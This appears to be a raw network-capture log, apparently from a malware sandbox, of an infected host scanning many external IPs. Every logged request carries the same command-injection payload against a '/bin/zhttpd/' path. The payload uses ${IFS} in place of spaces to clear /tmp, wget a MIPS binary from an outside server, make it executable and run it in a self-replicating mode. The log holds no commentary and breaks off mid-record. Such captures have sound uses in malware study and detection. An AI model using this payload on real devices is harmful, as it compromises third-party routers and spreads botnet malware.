                                            Feb 2, 2024 06:21:25.894748926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7881192.168.2.15389684.233.203.240443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.894798040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7882192.168.2.1547522143.113.236.24443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.894828081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7883192.168.2.1548220217.205.46.123443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.894860029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7884192.168.2.1554748185.124.140.185443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.894917965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7885192.168.2.1555560107.126.226.2443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.894952059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7886192.168.2.1553160124.32.3.166443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.894998074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7887192.168.2.153457636.121.40.145443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.895025015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7888192.168.2.154072071.127.57.242443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.895066977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7889192.168.2.1550912126.254.251.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.895114899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7890192.168.2.1558228189.87.59.42443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.895148039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7891192.168.2.155621254.178.173.117443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.895181894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7892192.168.2.154828874.84.48.10443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.895200014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7893192.168.2.154969838.21.211.47443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.895247936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7894192.168.2.1551932177.3.11.140443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.895291090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7895192.168.2.1555366113.157.240.46443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.895338058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7896192.168.2.153815894.133.234.47443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.895370960 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7897192.168.2.155256079.148.102.182443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.895395994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7898192.168.2.154835820.127.137.244443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.895407915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7899192.168.2.154411825.56.16.179443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.895472050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7900192.168.2.155370699.204.69.116443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.895530939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7901192.168.2.1550712185.216.23.81443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.895571947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7902192.168.2.155950614.10.20.215443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.895620108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7903192.168.2.154352679.225.181.178443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.895658016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7904192.168.2.1548294137.81.215.238443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.895708084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7905192.168.2.1535542158.163.13.47443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.895759106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7906192.168.2.154809277.205.95.35443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.895804882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7907192.168.2.155191687.109.57.239443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.895837069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7908192.168.2.154007214.169.19.118443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.895870924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7909192.168.2.1548034177.9.35.174443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.895894051 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7910192.168.2.155236854.76.248.53443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.895945072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7911192.168.2.1543436128.85.190.194443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.895976067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7912192.168.2.153556812.97.132.55443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.896017075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7913192.168.2.1548588116.178.65.92443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.896058083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7914192.168.2.15536585.225.117.179443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.896086931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7915192.168.2.1540678206.224.120.126443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.896115065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7916192.168.2.15398602.226.99.6443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.896162987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7917192.168.2.1534472205.184.63.233443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.896195889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7918192.168.2.15583421.223.139.101443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.896230936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7919192.168.2.1555668146.14.83.40443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.896269083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7920192.168.2.1542950192.210.69.98443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.896298885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7921192.168.2.154336435.228.246.87443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.896358013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7922192.168.2.1560962154.44.161.31443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.896389961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7923192.168.2.154062032.10.232.97443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.896436930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7924192.168.2.1540056185.73.27.216443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.896460056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7925192.168.2.153849883.5.21.108443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.896497011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7926192.168.2.1533558193.213.141.170443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.896524906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7927192.168.2.1538580216.199.2.16443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.896569967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7928192.168.2.1546682140.124.234.179443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.896595001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7929192.168.2.154144458.103.180.187443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.896622896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7930192.168.2.1553674124.193.30.96443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.896650076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7931192.168.2.155887274.194.38.52443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.896691084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7932192.168.2.1557584181.25.16.211443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.896728992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7933192.168.2.1536746205.134.232.147443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.896753073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7934192.168.2.1547336131.100.28.85443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.896805048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7935192.168.2.1553264221.118.181.108443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.896842003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7936192.168.2.154707236.226.215.168443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.896871090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7937192.168.2.153322485.146.201.100443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.896908998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7938192.168.2.153975250.116.238.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.896945000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7939192.168.2.154159013.157.250.161443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.896959066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7940192.168.2.154886492.125.6.180443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.897018909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7941192.168.2.1541410173.166.247.170443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.897063971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7942192.168.2.1556038106.43.127.165443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.897098064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7943192.168.2.154557453.207.242.213443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:25.897121906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            7944192.168.2.1552496208.206.245.230443
                                            TimestampBytes transferredDirectionData
